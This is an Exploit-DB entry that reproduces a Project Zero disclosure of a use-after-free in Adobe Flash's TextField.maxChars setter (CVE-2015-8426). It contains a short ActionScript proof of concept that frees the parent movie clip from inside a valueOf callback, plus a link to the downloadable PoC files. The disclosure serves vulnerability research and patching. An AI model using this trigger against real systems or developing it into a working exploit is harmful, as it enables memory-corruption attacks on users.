Adobe Flash - TextField.maxChars Use-After-Free

2016-04-01T00:00:00
ID EDB-ID:39650
Type exploitdb
Reporter Google Security Research
Modified 2016-04-01T00:00:00

Description

Adobe Flash - TextField.maxChars Use-After-Free. CVE-2015-8426. Dos exploits for multiple platform

                                        
                                            Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581

There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};

function func(){

        if (times == 0){
            times++;
            return 7;
        }
	mc.removeMovieClip();

        // Fix heap here

	return 7;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39650.zip